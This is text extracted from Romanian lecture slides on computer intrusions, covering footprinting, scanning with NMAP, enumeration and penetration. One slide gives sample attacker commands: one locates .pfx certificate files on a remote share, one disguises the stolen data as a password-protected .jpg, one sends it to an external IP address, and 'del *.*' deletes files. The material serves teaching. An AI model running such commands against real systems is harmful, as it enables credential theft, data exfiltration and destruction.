Documente Academic
Documente Profesional
Documente Cultură
intruziunilor
Ce este o intruziune?
2
Procesul de spargere: Accesul
• Amprentarea
Ușa
– Cercetarea online / colectarea
informațiilor, identificarea țintelor Exemple de scanare:
de valoare
NMAP GUI – Care este problema în
• Scanarea acest caz?
– Identificarea vulnerabilităților,
porturilor deschise și potențialilor
vectori de atac
• Enumerarea
– Se conectează la rețeaua victimă
și căută nume de utilizator, numele
serverului și alte vulnerabilități
exploatate
• Penetrare
– Exploatează și obține control la
distanță asupra sistemului victimei
3
Procesul de spargere: EVIL
• Fură date
– Colectează date sensibile;ex., dir\\<Redacted IP Address>\c$\*.pfx /s o
– Codigică/reduce datele; ex., regsrv a – hpzaq123 pro.jpg c:\temp
– Exfiltrează datele; ex., spik.exe 211.174.62.78 8080 p pro.jpg zaq123
4
Procesul de spargere
• Distruge datele
– del *.*
• Modifică datele
– Modifică salariul, notele,
datoria etc.
– Dezactivează site-uri
• Creează date false
– Trimite e-mailuri neautorizate din
contul unui conducător
5
Procesul de spargere
6
Exfiltrarea datelor
7
Țintele pentru exfiltrarea datelor